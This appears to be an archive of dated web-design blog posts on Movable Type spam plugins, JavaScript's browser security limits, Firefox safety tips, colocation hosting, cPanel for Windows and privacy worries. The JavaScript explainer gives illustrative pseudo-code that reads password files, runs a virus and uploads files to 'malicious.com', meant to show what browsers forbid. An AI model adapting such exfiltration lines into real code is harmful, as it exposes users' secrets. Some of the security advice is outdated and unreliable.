Tryangled Solutions web designing tips tricks

MT 3.3 offers a built-in spam protection plugin called SpamLookup. In addition to this plugin, there are several other options you can implement to help stem the tide of spam. Note that the spammers are constantly improving their methods to game the system, requiring constant vigilance on the part of the MT community to keep coming up with new ways to block them.

* SpamLookup
SpamLookup is a Movable Type plugin, developed by Brad Choate, that uses several techniques to identify spam, and then uses user-supplied choices to either moderate or block it. SpamLookup is an integrated part of MT 3.3, so if you have installed the latest version of MT, there is nothing more you need to install. SpamLookup utilizes several blacklist services to check incoming comments and trackbacks against known spammers. It allows you to either “junk” or moderate comments and trackbacks based on different settings for links and keywords. You can even “white list” domains or IP addresses. To adjust the settings on SpamLookup, simply open up your Plugins menu from the System Overview of your Movable Type editing window. Scroll to the bottom and select “Show Settings” from any of the SpamLookup modules. See Neil Turner’s suggestions on Making the Most of SpamLookup and David Philip’s SpamLookup’s Keyword Filter Explained for more information on how to best use this plugin.

* Akismet
Akismet is a distributed spam filtering service developed by the Wordpress community. According to the Akismet FAQ, the way it works is “When a new comment, trackback, or pingback comes to your blog it is submitted to the Akismet web service which runs hundreds of tests on the comment and returns a thumbs up or thumbs down.” MT developer Tim Appnel has created an MT plugin for Akismet (MT-Akismet) which can be downloaded from the Akismet website. Many have found Akismet to be more effective at catching spam than SpamLookup.

* Comment Challenge
Jay Allen’s Comment Challenge plugin requires a commenter to type a keyword into a separate field from the comment field in order for the comment cgi script to run. This plugin effectively halts automatic computer generated spam comments.

* Use a “Captcha”
A captcha is a security code that a commenter must enter in order for her comment to load. The benefit is that it screens out automated comment spam bots. The downside is that it keeps visually disabled people from easily contributing a comment. Arvind has released an SCode plugin to work with MT 3.2 - MT-SCode 1.0.

* Require approval before a comment posts
One way to ensure that your readers never have to see a spam message is that you personally approve comments before they are posted. MT3 has the comment moderation features built-in. (See Settings > Feedback > check “Immediate publish comments from No one”.)

Close old comments.
One way to cut down on blog spam is to reduce the opportunities by closing the ability to comment on blog posts older than X number of days. Mark Carey’s BlogJanitor plugin lets you do just that, and all automatically.

Client–side JavaScript has expressly been developed for use in a web browser in conjunction with HTML pages. This has certain consequences for security.

First of all, please note carefully what happens when a user visits a JavaScript–enhanced web site:
The user asks for a certain HTML page without knowing whether it contains JavaScript. The HTML page is delivered to the browser, including the scripts. The scripts usually run automatically when the page loads or when the user takes a certain action. In general the user can’t do anything to stop the scripts (well, he could turn off JavaScript, but few end users know how to do this, or that it can be done, or that JavaScript exists).

So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do.

1. JavaScript cannot read files from or write them to the file system on the computer. This would be a clear security hazard

filesystem.read(’/my/password/file’);
filesystem.write(’horridvirus.exe’);

2. JavaScript cannot execute any other programs. This would also be unacceptable

execute(’horridvirus.exe’)

3. JavaScript cannot establish any connection to whatever computer, except to download a new HTML page or to send mail. This, too, would create unacceptable hazards:

var security_hazard = connection.open(’malicious.com’);
security_hazard.upload(filesystem.read(’/my/password/file’));
security_hazard.upload(filesystem.read(’/ultra_secret/loans.xls’));

Thus JavaScript simply cannot do such dangerous things. Unfortunately Microsoft has seen fit to add some filesystem commands nonetheless, in combination with its ActiveX technology. This means that Explorer on Windows is structurally less safe than any other browser. It has some built–in protection, but hackers regularly find weaknesses. The first JavaScript virus I heard of works in such a way.

So JavaScript only works on things that are in HTML pages or part of the browser. You cannot influence anything that’s not contained by the browser. But even within the browser there are some no–go areas. Basically JavaScript wants to protect the privacy of the user by disallowing some actions and asking permission for others:

1. You cannot read out the history of the browser. Thus a malicious site owner cannot write a script that finds out where you surfed to recently.
You can go back or forward in the browsing history, but you cannot find out which page you’ll go to.
2. You cannot do anything in pages that come from another server. So if your frameset contains two pages from two servers, they cannot communicate with each other. Thus a malicious site owner cannot find out which sites you’ve opened in other browser windows. See the frame busting page for some more information.
3. You cannot set the value of a file upload field (<input type=”file”>).

document.forms[0].upload_field.value = ‘/my/password/file’;
document.forms[0].submit();

4. If you try to close a browser window that has not been opened by JavaScript, the user is asked to confirm this action.
However, this rule isn’t implemented in all browsers and is easy to work around in Explorer.
5. If you try to submit a form to a mail address by JavaScript, the user is asked to confirm this action.
6. You should not be able to open a new window smaller than 100×100 pixels and/or to position it outside the screen area of the computer. Thus a malicious site owner cannot spawn an invisible window.
Note that Explorer on Windows (and maybe other browsers, too) does allow this, contrary to safety regulations.

Thus JavaScript is a scripting language for influencing HTML elements, like forms, images, layers, paragraphs and such, and for influencing a few non–HTML objects like the browser window. Nothing more, but (most importantly) nothing less.

As it seems to be the case with every other browser release nowadays, IE 7 claims to “Put safety first”. There is some truth to this, as the folks at Microsoft definitely paid careful attention here especially when it comes to phishing protection. Some exploits were discovered early on, including personal data possibly being compromised, making it seem that the hackers were once again a step ahead. In fairness to Microsoft, Firefox 2.0 has also fallen victims to similar attacks during its first few months.

Occasionally, someone finds a flaw in Firefox (or a plugin) that allows any malicious web site you visit to take over your computer. This is less of a problem in Firefox than in some other browsers: according to research by Brian Krebs, Internet Explorer users were vulnerable to at least one known critical vulnerability for 70% of the days in 2005, while Firefox users were vulnerable for 5% of 2005.

Following these measures will keep Firefox from being vulnerable to these severe security holes most of the time:

* Let Firefox keep itself up-to-date. It usually does this automatically.
* Make sure your plugins, such as Flash and Java, are up-to-date. If you’re using Windows, see this page for instructions. (Hopefully, future versions of Firefox will warn when you have outdated plugins; see bug 271559.)

These optional measures that make your computer less likely to be infected with malware, even if your software is vulnerable:

* Restrict which browser features untrusted web sites can use. For example, many security holes in web browsers involve JavaScript or are difficult to exploit without JavaScript. An extension called NoScript allows you to restrict which sites are allowed to use JavaScript and plugins. Of course, this requires you to make decisions such as “should I trust this site to run JavaScript?” frequently when you visit new sites, and if your answer is always “yes”, it doesn’t protect you much. (Bug 38966, Bug 339056 and bug 94035 propose adding similar features to Firefox itself.)
* Avoid visiting malicious web sites. In particular, avoid visiting untrusted sites that feature:
o Song lyrics. Instead of searching for song lyrics using Google, search SongMeanings.net or try the band’s web site.
o Porn. If you look at porn, start somewhere safe, such as Tiava or MyFreePaySite.
o Pirated software. Instead of pirating software, consider looking for an open-source alternative.
* Consider using anti-virus software software, so that if a security hole is exploited in order to install a piece of common malicious software, the malicious software might not be allowed to run. You can’t rely on this kind of software to keep you safe because new viruses and spyware appear all the time, but it can be useful as a last line of defense.
* Consider using an operating system that usually isn’t targeted by authors of malicious software. For example, Mac OS X users are attacked much less often than Windows users (as of December 2006). Because of this, a Mac user without anti-virus software is quite a bit safer than a Windows user with anti-virus software.

Our open-source security strategy lets us find—and fix—security issues in record time, making Firefox the safest way to surf. Install upgrades when you receive automatic notification or wait until you’re ready.

You have decided that a dedicated server offers the best features for your online presence. There is no need to share resources and you can set up the server as you please. There remains just one question: Are you going to rent or buy your server? Dedicated hosting means that you are renting a server from a web host. But you also have the option of buying your own server and having the host provide the facilities to house it and connect it to the Internet. This service is called colocated hosting.

The advantages of colocating include all the advantages of dedicated hosting – you have the resources of the entire server and bandwidth to do with as you please. The additional benefit over dedicated hosting is the lower cost. Because you own the server, your monthly fees don’t include charges for hardware maintenance and upkeep. On the other hand, your initial outlay will be larger because you have to buy the server. If the server is good quality and remains in service for a reasonable length of time, however, your overall costs will be lower with colocation.

The cost of colocation depends on the amount of space your server occupies. Data centers house servers in racks that in turn are housed in cabinets. Cabinets are usually 40 rack units in height, with each rack unit equal to 1.75′. The cases of server computers are measured in rack heights – 1U = 1.75′. Typical sizes for servers are 1U, 2U and 4U, so the physical size of your server will determine how much the colocation host will charge per month. Bandwidth is another factor affecting price.

There are several options available when purchasing a server and getting it to the colocation data center. If you live in close proximity to the data center you could buy a server locally and set it up at your own premises. Once it is setup you can personally deliver it to the data center. Another option is to buy the server from a mail order retailer and have them deliver it directly to the data center. This is a good option if you are not located near the data center. It saves you the cost of shipping the server and the retailer will be responsible if the server happens to be damaged in transit.  The disadvantage is that you have to set up the server remotely through a web interface. The third option is to buy the server direct from the host. Not all hosts are in the business of selling servers, but those that do may offer financing and setup assistance.
Colocation or Dedicated?

Colocation puts you in charge of the hardware, but that also means that you are responsible in the case of hardware failure. If you have signed up for dedicated hosting you are renting the server, so the host will replace hard drives or CPUs if they malfunction. The initial costs of colocation are much higher than dedicated hosting. You have to buy the server as well as insurance and software licences. All that is included in a dedicated hosting plan. Hardware upgrades are also more expensive with colocation because you have to buy the new equipment outright and pay to have it installed. Dedicated hosting plans usually allow you to upgrade either hardware or bandwidth at a reasonable cost.

The main advantage of colocation is the lower monthly costs when compared with dedicated hosting plans. Other advantages include greater control over network configuration and more flexibility. A colocation provider has to be chosen carefully. After all, they will host both your hardware and your data. Consider such details as security, network redundancy, protection from fire and earthquakes, and backup generators in the case of power outages.

Cpanel, one of the leading providers of control panels for Linux and FreeBSD web hosting servers has announced that it would be releasing a beta version of a new Cpanel Server Suite that would be its first Microsoft Windows Server® 2008-based product line.

A Slashbot job advert seems to suggest that Cpanel is recruiting Windows application developers for this new venture.

Cpanel has been working on this Windows version for some time now. The only difference this time is that they are re-staffing and commiting more time and resources to it. Cpanel is expecting to release the beta version of the product on December 15th 2007 and have the production release available by March 30th 2008.

A press release by Microsoft quotes cPanel CEO J. Nick Koston as saying:

“Microsoft has shown a strong commitment to the hosting industry over the past several years. cPanel’s Windows development team feels that IIS7 offers a robust, high-performance Web server with increased security that the industry will quickly adopt. Microsoft Server 2008 and IIS7 with its modern architecture and support for legacy products was the natural starting point for our expanded product offering.”

It’s been a month or so since Google’s Desktop Search Application was released. My initial reaction when the software was launched was nervousness. We live in a time of daily security breaches and while I trust Google for the most part I am reluctant to install software that indexes too much as far as I’m concerned. Google’s application indexes data files, including word processing files, spreadsheets, presentations, e-mail messages, cached Web pages and chat sessions. What if it searches your cache and finds bank summaries or personal messages? What if it’s a shared machine and it accidentally shows you someone else’s personal information? I understand that Google found a capability that was missing in Microsoft’s OS and decided to fix it, and for that I applaud their efforts. Unfortunately at this time I’m not willing to take the security risks of installing their application.

If Google can work on this application and fix some of the security breaches I would be happy to install this application. Does it really need to index a computers cache, I personally don’t think so. I think this feature should be removed, and the same holds true for searching other machine user accounts.

If anyone has any additional information please let us in on it!

I was pretty amazed when I heard a company as prominent as DreamHost have a security leak as massive as 3,500 FTP accounts. Caydel was one of the unfortunate customers who had his account bypassed. Apparently he noticed a ton of spam links placed on his website, but didn’t think of anything at the time. Nevertheless, DreamHost still hasn’t discovered the security hole.